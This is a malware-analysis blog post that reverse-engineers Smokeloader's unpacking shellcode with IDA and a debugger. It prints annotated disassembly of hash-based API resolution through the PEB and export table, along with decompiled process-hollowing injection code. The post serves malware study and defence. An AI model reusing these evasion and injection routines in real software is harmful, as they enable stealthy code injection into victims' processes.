2/28/24 2:37 pm

Introduction

Hello Geeks, today I am going to dive deep into the shellcode used by Smokeloader in the unpacking process, the shell code is not too hard to understand and also has some challenges, I used some blogs for dealing with some structures so let’s do it…..

Overview

smoke loader is one of the most loaders used these days due to its efficiency in some techniques like

  • anti sandboxing
  • anti-debugging
  • AV Evasion
  • Process Injection
  • Anti Hooking

I will not analyze the sample in this blog, I will just analyze the code used in the unpacking process cause I think all malwares nowadays is packed and we need to understand how the unpacking process is done at the assembly level

FirstLook -_-

I have used an old sample cause u can find it easily with the SHA-1 hash “72FC3CE96BD9406215CEC015D70BBB67318F1E23”

I have found that the sample is flagged by 60 AV in Virustotal and also it used some functions not used many in the Malicious operation so that gives us an indicator of packing, but I will test it against PEID and look at the entropy of the sections .

big difference in raw and virtual size — figure 01

and here is how the entropy looks like in PEID which also gives a big indicator of packing

CODE Analysis

I will use IDA to dissemble the code, after some moves in the code tab and between functions I have discovered that the sample use many of junk code just to make the analysis operation harder, and when dealing with packed samples there is some API that we need to pay it our attention

  • VirtualAlloc
  • GlobalAlloc
  • LocalAlloc
  • VirtualAllocEx

so in sub_4019B0() there are two calls for LocalAlloc() API, one of them does nothing, and another one is called with argument dwsize

first call for local alloc figure 02

the function Missed_() at 0x0401E9F which does some changes for dwSize Global Var

So we need to trace the allocated space to get the data that will be written there, so in the next figure there is a data moving process using Pointers

Write data into the allocated Address — figure 03

so this block of code will write the content from (dword_45CF0C + k +0x8F176) ‘k’ here used as a counter, so we need to know what is the value in dword_45CF0C to know from where the data is copied,

before the loop, there is another some moving that’s may we pay attention

dword_45F0C = dword_448A84

after I checked the value in dword_448A84 it have initial value = 0x39AAA2

if we solve the equation above so the result will be like this

0x39AAA2 + 0x8F176 = 0x00429C18 → ShellCode Address

figure 04

so if we tried to jump for the resolved address 0x0429C18 that’s what I have found

figure 05

in sub_403206(int &lpaddress , SIZE_T &dwsize) there is another call for LocalAlloc API,

figure 06

and if we take a look at the end of this function there is a change in the lpaddress → shellcode address, so what I have extracted from this function is that, the function writes the code section of the shell code because what we seen above in figure 05 is not the real shellcode it’s just the data which will be used by the shellcode for payload injection

Change Protection and Transfer Execution

figure 07

so here is the packer will change the protection of the allocated memory where the shellcode have been written with 0x40 as protection

0x40 → PAGE_EXECUTE_READWRITE

and after that there is a call for the lpAddress → start of the shellcode ,so I will use the debugger for the next steps to extract the shellcode and also reverse it

Apply decryption for ShellCode

I know that you get confused but this may help you in your next unpacking process and change your mind about the unpacking and how to deal with it

we see a call to 0x404B83 at 0x401BAD address , I have renamed the function to mw_w_apply_decryption to express it’s behavior , the function takes 3 argument

push    offset unk_448000  
push    dwSize  
push    lpAddress  
call    mw_apply_decryption  

the unk_448000 contain some data we need to observe

inside mw_w_apply_decryption there a call for 0x404934 which I have renamed apply_decryption

 for ( i = 0; i < dwsize / 8; ++i )  
  {  
    if ( dwSize == 4445 )  
      VerifyVersionInfoW(&VersionInformation, 0, 0i64);  
    result = apply_decryption(lpaddress + 8 * i, unk__);  
  }

so we need to dive into this function and know where is the decryption part , and I see some XOR operation and also some bit shifting operation, I am really not interested in the decryption mechanism I just want to know what this function applies for the shellcode

figure 08

Advanced Dynamic Analysis

here is the first call for localAlloc() API ,

figure 09

We’ll keep our eyes on the allocated space ,

figure 10

here is we got the shellcode written in the allocated space, and as I said before ,at the end of this function there is a changing in lpaddress

mov dword ptr ds:[eax],edi

eax --> lpaddress  
edi --> the address of the shellcode 

figure 11

and here is the decryption part I explained above and also execution transfer

figure 12

and here is the start of the shellcode

figure 13

so I will dump this shellcode and try to analyze it with some tricks and using some structures, I will use IDA for the next analysis

after cleaning dumped memory and mapping addresses, here is the start of the shellcode .

the start of Shellcode- figure 14

inside sub_630, the shellcode uses stack string for evade detection by Security Solutions , but before this string resolving there is a call for sub_010 at address 0x647 which I have renamed sh_w_GetAPIAddr, let’s explore it to know why this name,

sh_w_GetAPI_Addr — figure 15

inside sub_0110 there another call for sub_042 I have renamed to sh_GetAPIAddr with 2 argument

call for API hashing resolve figure-16

ptr_loadlibrary = sh_GetAPIAddr(0xD4E88, 0xD5786);// get kerenl32_address and LoadLibrary address
ptr_GetProcAddr = sh_GetAPIAddr(0xD4E88, 0x348BFA);// get ProcAddress API addr

and the operation is that they pass a hash of dll name and API name also, and inside this function there is some playing with PEB structures and built-in modules, and the trick here is that all the Malware that Run_Time API resolving for evade detection and also making analysis harder, so I will dive inside this call to know how this operation is done and after that, I will learn you something makes passing this trick is so easy, let’s dive deep into sub_042 and know to this hashes is resolved to API address

I will write the code used for the method here and not use figures to make it easier tracing,and also I have commented on every assembly line for those who know how to deal with assembly -_-

seg000:00000042 sh_GetAPIAddr   proc near               

seg000:00000042
seg000:00000042 hash_Kerenl32 = dword ptr 8
seg000:00000042 hash_loadlibrary= dword ptr 0Ch
seg000:00000042
seg000:00000042 push ebp
seg000:00000043 mov ebp, esp
seg000:00000045 push ebx
seg000:00000046 push esi
seg000:00000047 push edi
seg000:00000048 push ecx
seg000:00000049 push dword ptr fs:loc_30 ; push PEB
seg000:00000050 pop eax ; eax –> [30] –> PEB
seg000:00000051 mov eax, [eax+0Ch] ; eax –> LoaderData
seg000:00000054 mov ecx, [eax+0Ch] ; ecx –> InloadOrderModuleList
seg000:00000057
seg000:00000057 loc_57:
seg000:00000057 mov edx, [ecx] ; edx –> address of the frist loaded Module
seg000:00000059 mov eax, [ecx+30h] ; eax –> BaseDllName
seg000:0000005C push 2 ; a3
seg000:0000005E mov edi, [ebp+hash_Kerenl32]
seg000:00000061 push edi ; edi –> Kerenl32_Hash
seg000:00000062 push eax ; loadedDllName
seg000:00000063 call hash_and_compare
seg000:00000068 test eax, eax
seg000:0000006A jz short loc_70 ; jump if eax = 0 –> comparesion successeded
seg000:0000006C mov ecx, edx
seg000:0000006E jmp short loc_57 ; edx –> address of the frist loaded Module
seg000:00000070 ; ---------------------------------------------------------------------------
seg000:00000070
seg000:00000070 loc_70:
seg000:00000070 mov eax, [ecx+18h] ; ecx –> InLoadOrderModuleList
seg000:00000070 ; eax = [ecx+0x18] –> DllBaseAddress
seg000:00000073 push eax ; push BaseAddress of Dll
seg000:00000074 mov ebx, [eax+3Ch] ; ebx –> elfanew (start of optional header)
seg000:00000077 add eax, ebx ; eax = baseaddress + elfanew
seg000:00000079 mov ebx, [eax+78h] ; ebx –> Data Directories[Export_Table]
seg000:0000007C pop eax ; pop eax –> eax = DllBaseAddress
seg000:0000007D push eax ; push DllBaseAddress
seg000:0000007E add ebx, eax ; ebx = Export_Table + DllBaseAddress
seg000:00000080 mov ecx, [ebx+1Ch] ; ecx = [ebx+1Ch] –> AddressOfFunctions
seg000:00000083 mov edx, [ebx+20h] ; edx = [ebx+1Ch] –> AddressOfNames
seg000:00000086 mov ebx, [ebx+24h] ; ebx = [ebx+24h] –> AddressOfNameOrdinals
seg000:00000089 add ecx, eax ; ecx = AddressOfFunction + DllBaseAddress
seg000:0000008B add edx, eax ; edx = AddressOfNames + DllBaseAddress
seg000:0000008D add ebx, eax ; ebx = AddressOfNameOrdinals + DllBaseAddress
seg000:0000008F
seg000:0000008F loc_8F:
seg000:0000008F mov esi, [edx]
seg000:00000091 pop eax
seg000:00000092 push eax ; eax –> DllBaseAddress
seg000:00000093 add esi, eax ; esi = [esi+eax] –> ApiName
seg000:00000095 push 1 ; a3
seg000:00000097 push [ebp+hash_loadlibrary] ; hash_kerenl32
seg000:0000009A push esi ; loadedDllName
seg000:0000009B call hash_and_compare
seg000:000000A0 test eax, eax
seg000:000000A2 jz short loc_AC ;
seg000:000000A2 ; eax –> DllBaseAddress
seg000:000000A4 add edx, 4
seg000:000000A7 add ebx, 2
seg000:000000AA jmp short loc_8F
seg000:000000AC ; ---------------------------------------------------------------------------
seg000:000000AC
seg000:000000AC loc_AC:
seg000:000000AC pop eax ;
seg000:000000AC ; eax –> DllBaseAddress
seg000:000000AD xor edx, edx ; edx = 0
seg000:000000AF mov dx, [ebx] ; dx = [ebx] –> Ordinal of resolved API
seg000:000000B2 shl edx, 2 ; edx * 4
seg000:000000B5 add ecx, edx ; ecx = AddressOfFunction + (edx*4)
seg000:000000B7 add eax, [ecx] ; eax = DllBaseAddress + ecx
seg000:000000B7 ; eax –> API_Address
seg000:000000B9 pop ecx
seg000:000000BA pop edi
seg000:000000BB pop esi
seg000:000000BC pop ebx
seg000:000000BD mov esp, ebp
seg000:000000BF pop ebp
seg000:000000C0 retn 8

seg000:000000C0 sh_GetAPIAddr endp
seg000:000000C0

so keep your eyes at this code fro some seconds, I tried to make comments easy to understand and also I will explain it line by line

at address 0x_49 the sample gets PEB Structure (process envinronment Block) reside in loc_30 which contains some data about the current process like modules loaded ,also this data is used by the loader

seg000:00000049     push    dword ptr fs:loc_30 ; push PEB
seg000:00000051     mov     eax, [eax+0Ch]  ; eax --> LoaderData  

here it gets the address of LoaderData by adding 0xc to eax
which contain PEB address

here is how loader data structure is

struct _PEB_LDR_DATA {                               //loader data Structure  
    DWORD                 Length_;                         //+00  
    DWORD                 Initialized;                     //+04  
    DWORD                 SsHandle;                        //+08  
    __LIST_ENTRY          InLoadOrderModuleList;           //+0C  
    __LIST_ENTRY          InMemoryOrderModuleList;         //+14  
    __LIST_ENTRY          InInitializationOrderModuleList; //+1C  
    DWORD                 EntryInProgress;                 //+24    
    DWORD                 ShutdownInProgress;              //+28  
    DWORD                 ShutdownThreadId;                //+2C  
};

seg000:00000054 mov ecx, [eax+0Ch] ; ecx –> InloadOrderModuleList

so adding 0xc to eax which contain loaderdata will give us the Address of
InLoadOrderModuleList which is a linkedlist of loaded modules and every node is
a structre.
and here is how this structure looks like

struct _LDR_DATA_TABLE_ENTRY{  
  __LIST_ENTRY              InLoadOrderLinks;              //+00  
  __LIST_ENTRY              InMemoryOrderLinks;            //+08  
  __LIST_ENTRY              InInitializationOrderLinks;    //+10  
  DWORD                     DllBase;                        //+18  
  DWORD                     EntryPoint;                     //+1C  
  DWORD                     SizeOfImage;                    //+20  
  DWORD                     FullDllNameLength;              //+24  
  char*                     FullDllName; // _UNICODE_STRING //+28  
  DWORD                     BaseDllNameLength;              //+2C  
  char*                     BaseDllName; //_UNICODE_STRING  //+30  
  DWORD                     Flags;                          //+34  
  short                     LoadCount;                      //+38  
  short                     TlsIndex;                       //+3C  
  union{  
  __LIST_ENTRY              HashLinks;  
  DWORD                     SectionPointer;  
  };  
  DWORD                     CheckSum;  
  union{  
    DWORD                   TimeDateStamp;  
    DWORD                   LoadedImports;  
  };  
  DWORD                     EntryPointActivationContext;  
  DWORD                     PatchInformation;  
  __LIST_ENTRY              ForwarderLinks;  
  __LIST_ENTRY              ServiceTagLinks;  
  __LIST_ENTRY              StaticLinks;  
};  

so the next assmebly line
is getting the first module :

seg000:00000057 mov edx, [ecx] ; edx –> address of the frist loaded Module

after that it get Name
of the dll loaded by adding 0x30
to ModuleBase address

seg000:00000059 mov eax, [ecx+30h] ; eax –> BaseDllName

after getting DLL name and saving a pointer to it into eax register

eax → points to Dll Name

the shellcode will have a call to sub_0C3 I have renamed to hash_and_Compare

Hash_and_Comare call — figure 17

this function takes 3 argument

1- value 2

2- precalculated hash to compare with — explore figure 16

3- Dll name resolved before

so I will try to analyze this function and know how hash algorithm works .

inside sub_c3 :

this line move Dll passed name pointer to eax
seg000:000000CF mov eax, [ebp+arg_Dll_Name] ; eax –> DLL Name

then it will create a loop to iterate over full Dll name

hashing loop — figure 18

and the Algorithm here is very simple and we can summarize it in some steps

1- get the lowercase of the char, A → a

2- add this char for the previous hash

3-shift-left of the result of step2 with 1 or multiplay with 2 ( shl ebx,1)

4- check if we reached the end of the name by checking null treminator

so after calculating the hash of DLL name it’s time for comparing the hash against the pre-calculated hash , and if the comparison failed this function will return 1 and If the camparison successeded it will return 0

figure 19

so If the comparison succeeded it will then try to resolve the API address using similar method using Export Table of the resolved Dll, I will give the code of this part

 
seg000:00000070 loc_70:                         ; ecx --> InLoadOrderModuleList                           
seg000:00000070         mov     eax, [ecx+18h]  ; ecx --> InLoadOrderModuleList  
seg000:00000070                                 ; eax = [ecx+0x18] --> DllBaseAddress  
seg000:00000073         push    eax             ; push BaseAddress of Dll  
seg000:00000074         mov     ebx, [eax+3Ch]  ; ebx --> elfanew (start of optional header)  
seg000:00000077         add     eax, ebx        ; eax = baseaddress + elfanew  
seg000:00000079         mov     ebx, [eax+78h]  ; ebx --> Data Directories[Export_Table]  
seg000:0000007C         pop     eax             ; pop eax --> eax = DllBaseAddress  
seg000:0000007D         push    eax             ; push DllBaseAddress  
seg000:0000007E         add     ebx, eax        ; ebx = Export_Table + DllBaseAddress  
seg000:00000080         mov     ecx, [ebx+1Ch]  ; ecx = [ebx+1Ch] --> AddressOfFunctions  
seg000:00000083         mov     edx, [ebx+20h]  ; edx = [ebx+1Ch] --> AddressOfNames  
seg000:00000086         mov     ebx, [ebx+24h]  ; ebx = [ebx+24h] --> AddressOfNameOrdinals  
seg000:00000089         add     ecx, eax        ; ecx = AddressOfFunction + DllBaseAddress  
seg000:0000008B         add     edx, eax        ; edx = AddressOfNames + DllBaseAddress  
seg000:0000008D         add     ebx, eax        ; ebx = AddressOfNameOrdinals + DllBaseAddress  
seg000:0000008F  

do u remember when i talked about Modulel linked list
so in line 0x0070 [ecx+18] will points to DllBaseAddress structure member
and this base address is address of this Dll in memroy

after that in line 0x0074 will add 0x3C to baseaddress and that will get
address of elfa_new –> points to the start of the optional header

in line 0x0079 it will 0x78 to eax which the RVA of Optional header start
so ebx –> points to Export_Table which is a structe of API information
like

-name
-address
-ordinal number

from line 0x0080 to 0x0086 it will resolve the address where this data is

ecx --> address of function  
edx --> address of Names  
ebx --> address of NameOrdinal  

and here is the structure :

typedef struct _IMAGE_EXPORT_DIRECTORY {  
    DWORD   Characteristics;        // 0x0    
    DWORD   TimeDateStamp;          // 0x4    
    WORD    MajorVersion;           // 0x8    
    WORD    MinorVersion;           // 0xA    
    DWORD   Name;                   // 0xC    
    DWORD   Base;                   // 0x10   
    DWORD   NumberOfFunctions;      // 0x14   
    DWORD   NumberOfNames;          // 0x18   
    DWORD   AddressOfFunctions;     // 0x1C   
    DWORD   AddressOfNames;         // 0x20   
    DWORD   AddressOfNameOrdinals;  // 0x24   
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

if you got confused about the above code and structures, this graph from Corkami project may help you click here

retrieve API Name

after playing with structures the shellcode will try to get API name and hash it with the same operation used before with DLL name

hash API name — figure 20

here it will push 3 arguments

  • API Name
  • a3 → to get the null terminator cause it unicode string
  • pre-calculated hash of API to compare with

so If the comparison sucesseded the shell code will try to resolve the address of The API using the same structure of Export Table

figure 20

and at the end of this function the Resolved API address will be saved in eax register .

I know you may miss many things due to my bad explanation but I am not that guy who is powerful in teaching people hard things.

so I will learn you how to deal with API hashing and let IDA do this job for you

first, u need to install hashdb plugin form Oalabs

so after u installed this plugin u need to come across the passed hash and right-click on it,

u will find something like hashdb Hunt Algorth

figure 21

after clicking on it, u need to wait for 15s and your output will be like this

hashdb output — figure 22

Choose the algorithm may give u a different result so if u are good with Call Argument u will know how to deal with this.

after that u will find a local type created in your LocalTypes tab with the name of the algorithm chosen before

local types — figure 23

so u come over your code and put cruser in the function and convert its argument type by clicking hot key ‘y’, and u will find this output on your screen

function argument type -figure 23

so u need to change the argument type from :

int → *algorithm name

so in my case, it will be like this

figure 24

and after that IDA will change this hashes to itss eqlevent API Name like this

Dynamic Api Resolving — figure 25

Building IAT (import address table)

after that in sub_630 it will resolve needed API addresses and build its API table, so after some reversing I created a structure for the resolved API Names to know what API is called inside another function

building IAT — figure 26

and here is how this structure looks like

struct API_IAT  
{  
  int ptr_LoadLibrary;  
  int ptr_GetProcAddr;  
  char var_D8;  
  int buffer;  
  int user32_hModule;  
  int MessageBoxA_api;  
  int GetMessageExtraInfo_api;  
  int kernel32_hModule;  
  int WinExec_api;  
  int CreateFileA_api;  
  int WriteFile_api;  
  int CloseHandle_api;  
  int CreateProcessA_api;  
  int GetThreadContext_api;  
  int VirtualAlloc_api;  
  int VirtualAllocExw_api;  
  int VirtualFree_api;  
  int ReadProcessMemory_api;  
  int WriteProcessMemory_api;  
  int SetThreadContext_api;  
  int ResumeThread_api;  
  int WaitForSingleObject_api;  
  int GetModuleFileNameA_api;  
  int GetCommandLineA_api;  
  int RegisterClassExA_api;  
  int CreateWindowExA_api;  
  int PostMessageA_api;  
  int GetMessageA_api;  
  int DefWindowProcA_api;  
  int GetFileAttributesA_api;  
  int ntdlldll_hModule;  
  int NtUnmapViewOfSection_api;  
  int NtWriteVirtualMemory_api;  
  int GetStartupInfoA_api;  
  int VirtualProtectEx_api;  
  int ExitProcess_api;  
};

at the end of sub_630 you will find the member [API_IAT.buffer] is being assigned with 0x15A0 value and there is a call to sub_5B0 with our structure as argument

figure 27

so when I jumped to address 0x15A0 I found the payload which will be dropped by this shellcode, which refers to a PE File

Pe File - figure 28

inside sub_110 there is an injection operation is done specially process hollowing, I will not explain how process hollowing is done cause I did this before in another article that explains process hollowing line by line, you can check it here.

and here is the code used for this operation

 v19 = 2;  
  buffer = IAT_Struct->buffer;                  // buffer = 0x15A0  
  ptr_optionalHeader = *(buffer + 0x3C) + IAT_Struct->buffer;// get elfanew  --> start of optionalheader  
  ptr_memory = (IAT_Struct->VirtualAlloc_api)(0, 10240, 4096, 4);  
  result = (IAT_Struct->GetModuleFileNameA_api)(0, ptr_memory, 10240);  
  if ( *ptr_optionalHeader == 'EP' )            // 'PE'  
  {  
    v15 = 0;  
    v16 = 0;  
    hProcess = 0;  
    v14 = 0;  
    memset(v3, 0, sizeof(v3));  
    v5 = 0;  
    v9 = 0;  
    v7 = 0;  
    v8 = 0;  
    v6 = 0;  
    v4 = 0;  
    (IAT_Struct->GetStartupInfoA_api)(v3);  
    commandLine_ = (IAT_Struct->GetCommandLineA_api)(0, 0, 0, 0x8000004, 0, 0, v3, &hProcess);  
    result = (IAT_Struct->CreateProcessA_api)(ptr_memory, commandLine_);  
    if ( result )                               // if successed the output is nonzero  
                                                //   
    {  
      (IAT_Struct->VirtualFree_api)(ptr_memory, 0, 0x8000);  
      ptr_memory_1 = (IAT_Struct->VirtualAlloc_api)(0, 4, 4096, 4);  
      *ptr_memory_1 = 65543;  
      result = (IAT_Struct->GetThreadContext_api)(v14, ptr_memory_1);  
      if ( result )  
      {  
        (IAT_Struct->ReadProcessMemory_api)(hProcess, ptr_memory_1[41] + 8, &base_address, 4, 0);  
        if ( base_address == *(ptr_optionalHeader + 0x34) )  
          (IAT_Struct->NtUnmapViewOfSection_api)(hProcess, base_address);  
        v11 = (IAT_Struct->VirtualAllocExw_api)(  
                hProcess,  
                *(ptr_optionalHeader + 52),  
                *(ptr_optionalHeader + 80),  
                12288,  
                64);  
        (IAT_Struct->NtWriteVirtualMemory_api)(hProcess, v11, IAT_Struct->buffer, *(ptr_optionalHeader + 84), 0);  
        for ( i = 0; i < *(ptr_optionalHeader + 6); ++i )  
        {  
          v17 = (*(buffer + 60) + IAT_Struct->buffer + 40 * i + 248);  
          (IAT_Struct->NtWriteVirtualMemory_api)(hProcess, v17[3] + v11, v17[5] + IAT_Struct->buffer, v17[4], 0);  
        }  
        (IAT_Struct->WriteProcessMemory_api)(hProcess, ptr_memory_1[41] + 8, ptr_optionalHeader + 52, 4, 0);  
        ptr_memory_1[44] = *(ptr_optionalHeader + 40) + v11;  
        (IAT_Struct->SetThreadContext_api)(v14, ptr_memory_1);  
        (IAT_Struct->ResumeThread_api)(v14);  
        (IAT_Struct->CloseHandle_api)(v14);  
        (IAT_Struct->CloseHandle_api)(hProcess);  
        return (IAT_Struct->ExitProcess_api)(0);  
      }  
    }  
  }  
  return result;  
}

so if we wanna summarize what this shellcode does it will be :

  • build IAT using runtime API resolving
  • run the parent process but in suspended state
  • unmap parent code from memory
  • map and inject the new payload which resides at 0x15A0
  • resume the process with the new payload

here is the end of the article and I hope you learn something new and if there is any mistakes do not hesitate to tell me .

thanks for your time -_- ……….

Article Link: https://farghlymal.github.io/2023-05-18-SmokeLoader-Shellcode/